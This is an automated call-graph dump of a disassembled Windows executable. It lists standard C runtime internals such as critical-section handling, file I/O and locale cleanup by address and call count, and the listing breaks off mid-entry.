5f119b 18221->18223 18222->18223 18224 5f56b7 ___free_lconv_mon 14 API calls 18222->18224 18225 5f1308 18223->18225 18224->18223 18228 5f1d28 LeaveCriticalSection 18225->18228 18227 5f12f1 18227->18211 18228->18227 18229->18207 18233 5f8f4a 18230->18233 18232 5ef27f __CreateFrameInfo 18232->18189 18234 5f8f59 __CreateFrameInfo 18233->18234 18235 5f8f66 18234->18235 18237 5f65c0 18234->18237 18235->18232 18238 5f670d std::_Lockit::_Lockit 5 API calls 18237->18238 18239 5f65dc 18238->18239 18239->18235 18241 5ed0bd 18240->18241 18243 5ed0cf ___scrt_uninitialize_crt 18240->18243 18242 5ed0cb 18241->18242 18245 5f217a 18241->18245 18242->16734 18243->16734 18248 5f22a5 18245->18248 18251 5f237e 18248->18251 18252 5f238a ___scrt_is_nonwritable_in_current_image 18251->18252 18259 5f1d11 EnterCriticalSection 18252->18259 18254 5f2400 18268 5f241e 18254->18268 18258 5f2394 ___scrt_uninitialize_crt 18258->18254 18260 5f22f2 18258->18260 18259->18258 18261 5f22fe ___scrt_is_nonwritable_in_current_image 18260->18261 18271 5ed13f EnterCriticalSection 18261->18271 18263 5f2341 18283 5f2372 18263->18283 18264 5f2308 ___scrt_uninitialize_crt 18264->18263 18272 5f2183 18264->18272 18384 5f1d28 LeaveCriticalSection 18268->18384 18270 5f2181 18270->18242 18271->18264 18273 5f2198 _Fputc 18272->18273 18274 5f219f 18273->18274 18275 5f21aa 18273->18275 18276 5f22a5 ___scrt_uninitialize_crt 77 API calls 18274->18276 18383 5ed153 LeaveCriticalSection 18283->18383 18384->18270 18393 5e7050 18396 5e7294 18393->18396 18399 5e72a9 18396->18399 18400 5e72bf 18399->18400 18401 5e72b8 18399->18401 18408 5f0ffb 18400->18408 18405 5f106c 18401->18405 18404 5e705a 18406 5f0ffb std::ios_base::_Init 32 API calls 18405->18406 18407 5f107e 18406->18407 18407->18404 18411 5f125e 18408->18411 18412 5f126a ___scrt_is_nonwritable_in_current_image 18411->18412 18419 5f1d11 EnterCriticalSection 18412->18419 18414 5f1278 18420 5f1082 18414->18420 18416 5f1285 18430 5f12ad 18416->18430 18419->18414 18421 5f109d 18420->18421 18422 5f1110 std::_Lockit::_Lockit 18420->18422 18421->18422 18423 5f10f0 18421->18423 18424 5fc065 std::ios_base::_Init 32 API calls 18421->18424 18422->18416 18423->18422 18425 5fc065 std::ios_base::_Init 32 API calls 18423->18425 18426 5f10e6 18424->18426 18427 5f1106 18425->18427 18428 5f56b7 ___free_lconv_mon 14 API calls 18426->18428 18429 5f56b7 ___free_lconv_mon 14 API calls 18427->18429 18428->18423 18429->18422 18433 5f1d28 LeaveCriticalSection 18430->18433 18432 5f102c 18432->18404 18433->18432 20046 5e8b50 20047 5e8b8e 20046->20047 20048 5e8b59 20046->20048 20048->20047 20051 5f2127 20048->20051 20050 5e8b81 20052 5f2139 20051->20052 20055 5f2142 ___scrt_uninitialize_crt 20051->20055 20053 5f22a5 ___scrt_uninitialize_crt 77 API calls 20052->20053 20054 5f213f 20053->20054 20054->20050 20056 5f2151 20055->20056 20059 5f242a 20055->20059 20056->20050 20060 5f2436 ___scrt_is_nonwritable_in_current_image 20059->20060 20067 5ed13f EnterCriticalSection 20060->20067 20062 5f2444 20063 5f2183 ___scrt_uninitialize_crt 77 API calls 20062->20063 20064 5f2455 20063->20064 20068 5f247e 20064->20068 20067->20062 20071 5ed153 LeaveCriticalSection 20068->20071 20070 5f2178 20070->20050 20071->20070 18463 5f7041 18464 5f705c ___scrt_is_nonwritable_in_current_image 18463->18464 18475 5f1d11 EnterCriticalSection 18464->18475 18466 5f7063 18476 5fcf7a 18466->18476 18469 5f7081 18495 5f70a7 18469->18495 18474 5f7192 2 API calls 18474->18469 18475->18466 18477 5fcf86 ___scrt_is_nonwritable_in_current_image 18476->18477 18478 5fcf8f 18477->18478 18479 5fcfb0 18477->18479 18480 5f1314 __Wcrtomb 14 API calls 18478->18480 18498 5f1d11 EnterCriticalSection 18479->18498 18482 5fcf94 18480->18482 18483 5f19ff __strnicoll 29 API calls 18482->18483 18484 5f7072 18483->18484 18484->18469 18489 5f70dc GetStartupInfoW 18484->18489 18485 5fcfe8 18506 5fd00f 18485->18506 18486 5fcfbc 18486->18485 18499 5fceca 18486->18499 18490 5f70f9 18489->18490 18491 5f707c 18489->18491 18490->18491 18492 5fcf7a 30 API calls 18490->18492 18491->18474 18493 5f7121 18492->18493 18493->18491 18494 5f7151 GetFileType 18493->18494 18494->18493 18515 5f1d28 LeaveCriticalSection 18495->18515 18497 5f7092 18498->18486 18500 5f69f4 __Getctype 14 API calls 18499->18500 18505 5fcedc 18500->18505 18501 5fcee9 18502 5f56b7 ___free_lconv_mon 14 API calls 18501->18502 18504 5fcf3e 18502->18504 18504->18486 18505->18501 18509 5f6470 18505->18509 18514 5f1d28 LeaveCriticalSection 18506->18514 18508 5fd016 18508->18484 18510 5f670d std::_Lockit::_Lockit 5 API calls 18509->18510 18511 5f648c 18510->18511 18512 5f64aa InitializeCriticalSectionAndSpinCount 18511->18512 18513 5f6495 18511->18513 18512->18513 18513->18505 18514->18508 18515->18497 18516 5ed240 18517 5f217a ___scrt_uninitialize_crt 77 API calls 18516->18517 18518 5ed248 18517->18518 18526 5f7ef2 18518->18526 18520 5ed24d 18536 5f7f9d 18520->18536 18523 5ed277 18524 5f56b7 ___free_lconv_mon 14 API calls 18523->18524 18525 5ed282 18524->18525 18527 5f7efe ___scrt_is_nonwritable_in_current_image 18526->18527 18540 5f1d11 EnterCriticalSection 18527->18540 18529 5f7f75 18545 5f7f94 18529->18545 18532 5f7f49 DeleteCriticalSection 18534 5f56b7 ___free_lconv_mon 14 API calls 18532->18534 18535 5f7f09 18534->18535 18535->18529 18535->18532 18541 5f1fd2 18535->18541 18537 5ed25c DeleteCriticalSection 18536->18537 18538 5f7fb4 18536->18538 18537->18520 18537->18523 18538->18537 18539 5f56b7 ___free_lconv_mon 14 API calls 18538->18539 18539->18537 18540->18535 18542 5f1fe5 _Fputc 18541->18542 18548 5f2090 18542->18548 18544 5f1ff1 _Fputc 18544->18535 18620 5f1d28 LeaveCriticalSection 18545->18620 18547 5f7f81 18547->18520 18549 5f209c ___scrt_is_nonwritable_in_current_image 18548->18549 18550 5f20c9 18549->18550 18551 5f20a6 18549->18551 18558 5f20c1 18550->18558 18559 5ed13f EnterCriticalSection 18550->18559 18552 5f1ba8 _Fputc 29 API calls 18551->18552 18552->18558 18554 5f20e7 18560 5f2002 18554->18560 18556 5f20f4 18574 5f211f 18556->18574 18558->18544 18559->18554 18561 5f200f 18560->18561 18562 5f2032 18560->18562 18563 5f1ba8 _Fputc 29 API calls 18561->18563 18564 5f21e8 ___scrt_uninitialize_crt 73 API calls 18562->18564 18572 5f202a 18562->18572 18563->18572 18565 5f204a 18564->18565 18566 5f7f9d 14 API calls 18565->18566 18567 5f2052 18566->18567 18568 5f8e44 _Ungetc 29 API calls 18567->18568 18569 5f205e 18568->18569 18577 5fd116 18569->18577 18572->18556 18573 5f56b7 ___free_lconv_mon 14 API calls 18573->18572 18619 5ed153 LeaveCriticalSection 18574->18619 18576 5f2125 18576->18558 18579 5fd13f 18577->18579 18581 5f2065 18577->18581 18578 5fd18e 18580 5f1ba8 _Fputc 29 API calls 18578->18580 18579->18578 18582 5fd166 18579->18582 18580->18581 18581->18572 18581->18573 18584 5fd1b9 18582->18584 18585 5fd1c5 ___scrt_is_nonwritable_in_current_image 18584->18585 18592 5fd018 EnterCriticalSection 18585->18592 18587 5fd1d3 18588 5fd204 18587->18588 18593 5fd076 18587->18593 18606 5fd23e 18588->18606 18592->18587 18594 5fcdcf _Fputc 29 API calls 18593->18594 18597 5fd086 18594->18597 18595 5fd08c 18609 5fce39 18595->18609 18597->18595 18598 5fd0be 18597->18598 18600 5fcdcf _Fputc 29 API calls 18597->18600 18598->18595 18599 5fcdcf _Fputc 29 API calls 18598->18599 18601 5fd0ca CloseHandle 18599->18601 18602 5fd0b5 18600->18602 18601->18595 18603 5fd0d6 GetLastError 18601->18603 18604 5fcdcf _Fputc 29 API calls 18602->18604 18603->18595 18604->18598 18605 5fd0e4 _Fputc 18605->18588 18618 5fd03b LeaveCriticalSection 18606->18618 18608 5fd227 18608->18581 18610 5fceaf 18609->18610 18611 5fce48 18609->18611 18612 5f1314 __Wcrtomb 14 API calls 18610->18612 18611->18610 18616 5fce72 18611->18616 18613 5fceb4 18612->18613 18614 5f1327 __dosmaperr 14 API calls 18613->18614 18615 5fce9f 18614->18615 18615->18605 18616->18615 18617 5fce99 SetStdHandle 18616->18617 18617->18615 18618->18608 18619->18576 18620->18547 19128 5e8a60 19129 5e8a82 19128->19129 19133 5e8a97 19128->19133 19134 5e8bf5 19129->19134 19137 5e8c10 19134->19137 19138 5e8c61 19134->19138 19135 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19136 5e8a87 19135->19136 19136->19133 19140 5f2a79 19136->19140 19137->19138 19139 5f2ab4 78 API calls 19137->19139 19138->19135 19139->19138 19141 5f2a99 19140->19141 19142 5f2a84 19140->19142 19141->19142 19144 5f2aa0 19141->19144 19143 5f1314 __Wcrtomb 14 API calls 19142->19143 19145 5f2a89 19143->19145 19150 5f13c4 19144->19150 19147 5f19ff __strnicoll 29 API calls 19145->19147 19149 5f2a94 19147->19149 19148 5f2aaf 19148->19133 19149->19133 19151 5f13d7 _Fputc 19150->19151 19154 5f163d 19151->19154 19153 5f13ec _Fputc 19153->19148 19156 5f1649 ___scrt_is_nonwritable_in_current_image 19154->19156 19155 5f164f 19157 5f1ba8 _Fputc 29 API calls 19155->19157 19156->19155 19158 5f1692 19156->19158 19160 5f166a 19157->19160 19165 5ed13f EnterCriticalSection 19158->19165 19160->19153 19161 5f169e 19166 5f1551 19161->19166 19163 5f16b4 19177 5f16dd 19163->19177 19165->19161 19167 5f1577 19166->19167 19168 5f1564 19166->19168 19180 5f1478 19167->19180 19168->19163 19170 5f159a 19171 5f1628 19170->19171 19172 5f15b5 19170->19172 19184 5fc36c 19170->19184 19171->19163 19174 5f21e8 ___scrt_uninitialize_crt 73 API calls 19172->19174 19175 5f15c8 19174->19175 19198 5fc152 19175->19198 19249 5ed153 LeaveCriticalSection 19177->19249 19179 5f16e5 19179->19160 19181 5f14e1 19180->19181 19182 5f1489 19180->19182 19181->19170 19182->19181 19201 5fc112 19182->19201 19185 5fc73e 19184->19185 19186 5fc74d 19185->19186 19187 5fc775 19185->19187 19188 5f1ba8 _Fputc 29 API calls 19186->19188 19189 5f8e44 _Ungetc 29 API calls 19187->19189 19197 5fc768 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19188->19197 19190 5fc77e 19189->19190 19211 5fc170 19190->19211 19193 5fc828 19214 5fc3c8 19193->19214 19195 5fc83f 19195->19197 19226 5fc573 19195->19226 19197->19172 19199 5fc2b3 _Fputc 31 API calls 19198->19199 19200 5fc16b 19199->19200 19200->19171 19202 5fc126 _Fputc 19201->19202 19205 5fc2b3 19202->19205 19204 5fc13b _Fputc 19204->19181 19206 5fcdcf _Fputc 29 API calls 19205->19206 19207 5fc2c5 19206->19207 19208 5fc2e1 SetFilePointerEx 19207->19208 19209 5fc2cd _Fputc 19207->19209 19208->19209 19210 5fc2f9 GetLastError 19208->19210 19209->19204 19210->19209 19233 5fc18e 19211->19233 19215 5fc3d7 _Fputc 19214->19215 19216 5f8e44 _Ungetc 29 API calls 19215->19216 19218 5fc3f3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19216->19218 19217 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19219 5fc571 19217->19219 19220 5fc170 33 API calls 19218->19220 19225 5fc3ff 19218->19225 19219->19197 19221 5fc453 19220->19221 19222 5fc485 ReadFile 19221->19222 19221->19225 19223 5fc4ac 19222->19223 19222->19225 19224 5fc170 33 API calls 19223->19224 19224->19225 19225->19217 19227 5f8e44 _Ungetc 29 API calls 19226->19227 19228 5fc586 19227->19228 19229 5fc170 33 API calls 19228->19229 19232 5fc5d0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19228->19232 19230 5fc62d 19229->19230 19231 5fc170 33 API calls 19230->19231 19230->19232 19231->19232 19232->19197 19235 5fc19a ___scrt_is_nonwritable_in_current_image 19233->19235 19234 5fc1dd 19236 5f1ba8 _Fputc 29 API calls 19234->19236 19235->19234 19237 5fc223 19235->19237 19243 5fc189 19235->19243 19236->19243 19244 5fd018 EnterCriticalSection 19237->19244 19239 5fc229 19240 5fc24a 19239->19240 19241 5fc2b3 _Fputc 31 API calls 19239->19241 19245 5fc2ab 19240->19245 19241->19240 19243->19193 19243->19195 19243->19197 19244->19239 19248 5fd03b LeaveCriticalSection 19245->19248 19247 5fc2b1 19247->19243 19248->19247 19249->19179 19321 5f7600 19324 5f1d28 LeaveCriticalSection 19321->19324 19323 5f7607 19324->19323 19474 5e8af0 19475 5e8aff 19474->19475 19477 5e8b23 19475->19477 19478 5f304b 19475->19478 19479 5f305e _Fputc 19478->19479 19482 5f30b8 19479->19482 19481 5f3073 _Fputc 19481->19477 19483 5f30ed 19482->19483 19484 5f30ca 19482->19484 19483->19484 19487 5f3114 19483->19487 19485 5f1ba8 _Fputc 29 API calls 19484->19485 19486 5f30e5 19485->19486 19486->19481 19490 5f31ee 19487->19490 19491 5f31fa ___scrt_is_nonwritable_in_current_image 19490->19491 19498 5ed13f EnterCriticalSection 19491->19498 19493 5f3208 19499 5f314e 19493->19499 19495 5f3215 19508 5f323d 19495->19508 19498->19493 19500 5f21e8 ___scrt_uninitialize_crt 73 API calls 19499->19500 19501 5f3169 19500->19501 19502 5f7f9d 14 API calls 19501->19502 19503 5f3173 19502->19503 19504 5f69f4 __Getctype 14 API calls 19503->19504 19507 5f318e 19503->19507 19505 5f31b2 19504->19505 19506 5f56b7 ___free_lconv_mon 14 API calls 19505->19506 19506->19507 19507->19495 19511 5ed153 LeaveCriticalSection 19508->19511 19510 5f314c 19510->19481 19511->19510 20475 5e51f0 20476 5e520f 20475->20476 20477 5e5237 20475->20477 20481 5e5390 20476->20481 20485 5e5440 20477->20485 20479 5e522f 20482 5e53da std::ios_base::_Init 20481->20482 20489 5e5530 20482->20489 20486 5e5487 std::ios_base::_Init 20485->20486 20487 5e5530 std::ios_base::_Init 30 API calls 20486->20487 20488 5e54bc 20487->20488 20488->20479 20502 5e5730 20489->20502 20493 5e556f std::ios_base::_Init 20494 5e5730 std::ios_base::_Init 5 API calls 20493->20494 20501 5e55a8 std::ios_base::_Init 20493->20501 20495 5e5602 20494->20495 20509 5e5850 20495->20509 20499 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20500 5e53f9 20499->20500 20500->20479 20501->20499 20503 5e574b std::ios_base::_Init 20502->20503 20504 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20503->20504 20505 5e555d 20504->20505 20505->20493 20506 5e57b0 20505->20506 20516 5e7974 20506->20516 20510 5e587e std::ios_base::_Init 20509->20510 20511 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20510->20511 20512 5e5619 20511->20512 20513 5e58f0 20512->20513 20530 5e5990 20513->20530 20521 5e7a0d 20516->20521 20519 5ea45c Concurrency::cancel_current_task RaiseException 20520 5e7993 20519->20520 20524 5e67c0 20521->20524 20525 5e6801 std::bad_exception::bad_exception 20524->20525 20526 5eaa5d ___std_exception_copy 29 API calls 20525->20526 20527 5e6820 20526->20527 20528 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20527->20528 20529 5e682a 20528->20529 20529->20519 20533 5e59b0 20530->20533 20534 5e59c7 std::ios_base::_Init 20533->20534 20537 5e2b20 20534->20537 20538 5e2b3f 20537->20538 20539 5e2b33 20537->20539 20540 5e2b5f 20538->20540 20541 5e2b4c 20538->20541 20539->20501 20552 5e2c30 20540->20552 20544 5e2bc0 20541->20544 20545 5e2bde 20544->20545 20546 5e2be3 20544->20546 20555 5e2c50 20545->20555 20548 5e2c30 std::ios_base::_Init 3 API calls 20546->20548 20550 5e2bee 20548->20550 20549 5e2bfb 20549->20539 20550->20549 20559 5f1a0f 20550->20559 20553 5e7153 std::ios_base::_Init 3 API calls 20552->20553 20554 5e2c42 20553->20554 20554->20539 20556 5e2c68 std::ios_base::_Init 20555->20556 20557 5ea45c Concurrency::cancel_current_task RaiseException 20556->20557 20558 5e2c7d 20557->20558 20560 5f1c4e __strnicoll 29 API calls 20559->20560 20561 5f1a1e 20560->20561 20562 5f1a2c __Getctype 11 API calls 20561->20562 20563 5f1a2b 20562->20563 20577 5f5bf0 20578 5f5c0b 20577->20578 20579 5f5bfb 20577->20579 20583 5f5cf5 20579->20583 20582 5f56b7 ___free_lconv_mon 14 API calls 20582->20578 20584 5f5d0a 20583->20584 20587 5f5d10 20583->20587 20586 5f56b7 ___free_lconv_mon 14 API calls 20584->20586 20585 5f56b7 ___free_lconv_mon 14 API calls 20588 5f5d1c 20585->20588 20586->20587 20587->20585 20589 5f56b7 ___free_lconv_mon 14 API calls 20588->20589 20590 5f5d27 20589->20590 20591 5f56b7 ___free_lconv_mon 14 API calls 20590->20591 20592 5f5d32 20591->20592 20593 5f56b7 ___free_lconv_mon 14 API calls 20592->20593 20594 5f5d3d 20593->20594 20595 5f56b7 ___free_lconv_mon 14 API calls 20594->20595 20596 5f5d48 20595->20596 20597 5f56b7 ___free_lconv_mon 14 API calls 20596->20597 20598 5f5d53 20597->20598 20599 5f56b7 ___free_lconv_mon 14 API calls 20598->20599 20600 5f5d5e 20599->20600 20601 5f56b7 ___free_lconv_mon 14 API calls 20600->20601 20602 5f5d69 20601->20602 20603 5f56b7 ___free_lconv_mon 14 API calls 20602->20603 20604 5f5d77 20603->20604 20609 5f5e6e 20604->20609 20610 5f5e7a ___scrt_is_nonwritable_in_current_image 20609->20610 20625 5f1d11 EnterCriticalSection 20610->20625 20612 5f5eae 20626 5f5ecd 20612->20626 20613 5f5e84 20613->20612 20616 5f56b7 ___free_lconv_mon 14 API calls 20613->20616 20616->20612 20617 5f5ed9 20618 5f5ee5 ___scrt_is_nonwritable_in_current_image 20617->20618 20630 5f1d11 EnterCriticalSection 20618->20630 20620 5f5eef 20621 5f5c11 __Getctype 14 API calls 20620->20621 20622 5f5f02 20621->20622 20631 5f5f22 20622->20631 20625->20613 20629 5f1d28 LeaveCriticalSection 20626->20629 20628 5f5d9d 20628->20617 20629->20628 20630->20620 20634 5f1d28 LeaveCriticalSection 20631->20634 20633 5f5c03 20633->20582 20634->20633 20772 5e8990 20773 5e89a4 20772->20773 20774 5e8bf5 78 API calls 20773->20774 20779 5e89ff 20773->20779 20775 5e89cf 20774->20775 20776 5f13c4 76 API calls 20775->20776 20777 5e89ec 20775->20777 20775->20779 20776->20777 20777->20779 20780 5f25ea 20777->20780 20781 5f260a 20780->20781 20782 5f25f5 20780->20782 20783 5f2627 20781->20783 20784 5f2612 20781->20784 20785 5f1314 __Wcrtomb 14 API calls 20782->20785 20794 5fc336 20783->20794 20786 5f1314 __Wcrtomb 14 API calls 20784->20786 20788 5f25fa 20785->20788 20789 5f2617 20786->20789 20790 5f19ff __strnicoll 29 API calls 20788->20790 20791 5f19ff __strnicoll 29 API calls 20789->20791 20793 5f2605 20790->20793 20792 5f2622 20791->20792 20792->20779 20793->20779 20795 5fc34a _Fputc 20794->20795 20798 5fc8df 20795->20798 20797 5fc356 _Fputc 20797->20792 20799 5fc8eb ___scrt_is_nonwritable_in_current_image 20798->20799 20800 5fc915 20799->20800 20801 5fc8f2 20799->20801 20809 5ed13f EnterCriticalSection 20800->20809 20802 5f1ba8 _Fputc 29 API calls 20801->20802 20804 5fc90b 20802->20804 20804->20797 20805 5fc923 20810 5fc73e 20805->20810 20807 5fc932 20823 5fc964 20807->20823 20809->20805 20811 5fc74d 20810->20811 20812 5fc775 20810->20812 20813 5f1ba8 _Fputc 29 API calls 20811->20813 20814 5f8e44 _Ungetc 29 API calls 20812->20814 20822 5fc768 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20813->20822 20815 5fc77e 20814->20815 20816 5fc170 33 API calls 20815->20816 20817 5fc79c 20816->20817 20818 5fc828 20817->20818 20820 5fc83f 20817->20820 20817->20822 20819 5fc3c8 34 API calls 20818->20819 20819->20822 20821 5fc573 33 API calls 20820->20821 20820->20822 20821->20822 20822->20807 20826 5ed153 LeaveCriticalSection 20823->20826 20825 5fc96c 20825->20804 20826->20825 19968 5e86a0 19970 5e86bb 19968->19970 19969 5e86cd 19970->19969 19972 5e8091 19970->19972 19975 5f3a8e 19972->19975 19976 5f3a9a ___scrt_is_nonwritable_in_current_image 19975->19976 19977 5f3ab8 19976->19977 19978 5f3aa1 19976->19978 19988 5ed13f EnterCriticalSection 19977->19988 19979 5f1314 __Wcrtomb 14 API calls 19978->19979 19981 5f3aa6 19979->19981 19983 5f19ff __strnicoll 29 API calls 19981->19983 19982 5f3ac7 19989 5f3b0c 19982->19989 19985 5e80a3 19983->19985 19985->19969 19986 5f3ad5 20003 5f3b04 19986->20003 19988->19982 19991 5f3b22 19989->19991 19996 5f3bac _Ungetc 19989->19996 19990 5f3b50 19993 5f8e44 _Ungetc 29 API calls 19990->19993 19990->19996 19991->19990 19991->19996 20006 5ff40f 19991->20006 19994 5f3b62 19993->19994 19995 5f3b85 19994->19995 19997 5f8e44 _Ungetc 29 API calls 19994->19997 19995->19996 20011 5f3bc2 19995->20011 19996->19986 19998 5f3b6e 19997->19998 19998->19995 20000 5f8e44 _Ungetc 29 API calls 19998->20000 20001 5f3b7a 20000->20001 20002 5f8e44 _Ungetc 29 API calls 20001->20002 20002->19995 20038 5ed153 LeaveCriticalSection 20003->20038 20005 5f3b0a 20005->19985 20007 5f69f4 __Getctype 14 API calls 20006->20007 20008 5ff42c 20007->20008 20009 5f56b7 ___free_lconv_mon 14 API calls 20008->20009 20010 5ff436 20009->20010 20010->19990 20012 5f8e44 _Ungetc 29 API calls 20011->20012 20013 5f3be5 20012->20013 20014 5f8e44 _Ungetc 29 API calls 20013->20014 20021 5f3c0e 20013->20021 20016 5f3bf3 20014->20016 20015 5f3c48 20022 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20015->20022 20018 5f8e44 _Ungetc 29 API calls 20016->20018 20016->20021 20019 5f3c01 20018->20019 20020 5f8e44 _Ungetc 29 API calls 20019->20020 20020->20021 20021->20015 20024 5f8b36 20021->20024 20023 5f3cc6 20022->20023 20023->19996 20025 5f8b49 _Fputc 20024->20025 20028 5f8b70 20025->20028 20027 5f8b5e _Fputc 20027->20015 20029 5f8b85 20028->20029 20030 5f8bc6 20029->20030 20032 5ed5c0 _Fputc 48 API calls 20029->20032 20033 5f8bb2 std::bad_exception::bad_exception 20029->20033 20036 5f8b89 _Fputc std::bad_exception::bad_exception 20029->20036 20030->20033 20034 5f5801 _Fputc WideCharToMultiByte 20030->20034 20030->20036 20031 5f1ba8 _Fputc 29 API calls 20031->20036 20032->20030 20033->20031 20033->20036 20035 5f8c81 20034->20035 20035->20036 20037 5f8c97 GetLastError 20035->20037 20036->20027 20037->20033 20037->20036 20038->20005 21053 5e87a0 21054 5e87ac __EH_prolog3_GS 21053->21054 21057 5e87fe 21054->21057 21058 5e8818 21054->21058 21063 5e87c6 21054->21063 21069 5e804d 21057->21069 21072 5f248a 21058->21072 21062 5e6840 std::ios_base::_Init 29 API calls 21062->21063 21096 5e9dbe 21063->21096 21064 5e88d4 21064->21062 21065 5e8837 21065->21064 21067 5f248a 45 API calls 21065->21067 21068 5e890e 21065->21068 21092 5e7b8b 21065->21092 21067->21065 21068->21064 21099 5f3927 21068->21099 21112 5f2645 21069->21112 21073 5f2496 ___scrt_is_nonwritable_in_current_image 21072->21073 21074 5f24b8 21073->21074 21075 5f24a0 21073->21075 21375 5ed13f EnterCriticalSection 21074->21375 21076 5f1314 __Wcrtomb 14 API calls 21075->21076 21078 5f24a5 21076->21078 21080 5f19ff __strnicoll 29 API calls 21078->21080 21079 5f24c3 21081 5f8e44 _Ungetc 29 API calls 21079->21081 21089 5f24db 21079->21089 21091 5f24b0 21080->21091 21081->21089 21082 5f256b 21376 5f25a3 21082->21376 21083 5f2543 21085 5f1314 __Wcrtomb 14 API calls 21083->21085 21087 5f2548 21085->21087 21086 5f2571 21386 5f259b 21086->21386 21090 5f19ff __strnicoll 29 API calls 21087->21090 21089->21082 21089->21083 21090->21091 21091->21065 21093 5e7bbf 21092->21093 21095 5e7b9b 21092->21095 21390 5e902f 21093->21390 21095->21065 21097 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21096->21097 21098 5e9dc8 21097->21098 21098->21098 21100 5f3933 ___scrt_is_nonwritable_in_current_image 21099->21100 21101 5f394f 21100->21101 21102 5f393a 21100->21102 21401 5ed13f EnterCriticalSection 21101->21401 21104 5f1314 __Wcrtomb 14 API calls 21102->21104 21106 5f393f 21104->21106 21105 5f3959 21402 5f399a 21105->21402 21108 5f19ff __strnicoll 29 API calls 21106->21108 21110 5f394a 21108->21110 21110->21068 21113 5f2651 ___scrt_is_nonwritable_in_current_image 21112->21113 21114 5f266f 21113->21114 21115 5f2658 21113->21115 21125 5ed13f EnterCriticalSection 21114->21125 21116 5f1314 __Wcrtomb 14 API calls 21115->21116 21118 5f265d 21116->21118 21121 5f19ff __strnicoll 29 API calls 21118->21121 21119 5f267b 21126 5f26bc 21119->21126 21123 5e8058 21121->21123 21123->21063 21125->21119 21127 5f273f 21126->21127 21128 5f26d9 21126->21128 21130 5f8e44 _Ungetc 29 API calls 21127->21130 21131 5f2806 21127->21131 21129 5f8e44 _Ungetc 29 API calls 21128->21129 21133 5f26df 21129->21133 21134 5f2754 21130->21134 21162 5f2686 21131->21162 21181 5fde7e 21131->21181 21132 5f2702 21132->21127 21146 5f271d 21132->21146 21133->21132 21136 5f8e44 _Ungetc 29 API calls 21133->21136 21137 5f2777 21134->21137 21140 5f8e44 _Ungetc 29 API calls 21134->21140 21139 5f26eb 21136->21139 21137->21131 21138 5f278e 21137->21138 21141 5f25df 43 API calls 21138->21141 21139->21132 21144 5f8e44 _Ungetc 29 API calls 21139->21144 21142 5f2760 21140->21142 21143 5f2797 21141->21143 21142->21137 21148 5f8e44 _Ungetc 29 API calls 21142->21148 21149 5ed2bf __Getctype 48 API calls 21143->21149 21143->21162 21147 5f26f7 21144->21147 21146->21162 21166 5f25df 21146->21166 21150 5f8e44 _Ungetc 29 API calls 21147->21150 21151 5f276c 21148->21151 21152 5f27af 21149->21152 21150->21132 21153 5f8e44 _Ungetc 29 API calls 21151->21153 21154 5f27d9 21152->21154 21155 5f25df 43 API calls 21152->21155 21153->21137 21177 5f8cda 21154->21177 21158 5f27c0 21155->21158 21157 5f27ed 21160 5f1314 __Wcrtomb 14 API calls 21157->21160 21157->21162 21158->21154 21159 5f27c6 21158->21159 21161 5f3927 31 API calls 21159->21161 21160->21162 21161->21162 21163 5f26b4 21162->21163 21374 5ed153 LeaveCriticalSection 21163->21374 21165 5f26ba 21165->21123 21167 5f25a3 21166->21167 21168 5f25af 21167->21168 21170 5f25c4 21167->21170 21169 5f1314 __Wcrtomb 14 API calls 21168->21169 21172 5f25b4 21169->21172 21171 5f25d3 21170->21171 21202 5fde73 21170->21202 21171->21146 21174 5f19ff __strnicoll 29 API calls 21172->21174 21176 5f25bf 21174->21176 21176->21146 21178 5f8ced _Fputc 21177->21178 21355 5f8d11 21178->21355 21180 5f8cff _Fputc 21180->21157 21182 5fe018 21181->21182 21183 5fe027 21182->21183 21187 5fe03c 21182->21187 21184 5f1314 __Wcrtomb 14 API calls 21183->21184 21185 5fe02c 21184->21185 21186 5f19ff __strnicoll 29 API calls 21185->21186 21196 5fe037 21186->21196 21188 5fe09a 21187->21188 21189 5ff40f _Ungetc 14 API calls 21187->21189 21187->21196 21190 5f8e44 _Ungetc 29 API calls 21188->21190 21189->21188 21191 5fe0ca 21190->21191 21192 602d83 43 API calls 21191->21192 21193 5fe0d2 21192->21193 21194 5f8e44 _Ungetc 29 API calls 21193->21194 21193->21196 21195 5fe10c 21194->21195 21195->21196 21197 5f8e44 _Ungetc 29 API calls 21195->21197 21196->21162 21198 5fe11a 21197->21198 21198->21196 21199 5f8e44 _Ungetc 29 API calls 21198->21199 21200 5fe128 21199->21200 21201 5f8e44 _Ungetc 29 API calls 21200->21201 21201->21196 21203 5fde89 21202->21203 21204 5fde96 21203->21204 21208 5fdeae 21203->21208 21205 5f1314 __Wcrtomb 14 API calls 21204->21205 21206 5fde9b 21205->21206 21207 5f19ff __strnicoll 29 API calls 21206->21207 21217 5f25d0 21207->21217 21209 5fdf0d 21208->21209 21211 5ff40f _Ungetc 14 API calls 21208->21211 21208->21217 21210 5f8e44 _Ungetc 29 API calls 21209->21210 21212 5fdf26 21210->21212 21211->21209 21223 602d83 21212->21223 21215 5f8e44 _Ungetc 29 API calls 21216 5fdf5f 21215->21216 21216->21217 21218 5f8e44 _Ungetc 29 API calls 21216->21218 21217->21146 21219 5fdf6d 21218->21219 21219->21217 21220 5f8e44 _Ungetc 29 API calls 21219->21220 21221 5fdf7b 21220->21221 21222 5f8e44 _Ungetc 29 API calls 21221->21222 21222->21217 21224 602d8f ___scrt_is_nonwritable_in_current_image 21223->21224 21225 602d97 21224->21225 21229 602db2 21224->21229 21226 5f1327 __dosmaperr 14 API calls 21225->21226 21227 602d9c 21226->21227 21228 5f1314 __Wcrtomb 14 API calls 21227->21228 21237 5fdf2e 21228->21237 21230 602dc9 21229->21230 21231 602e04 21229->21231 21232 5f1327 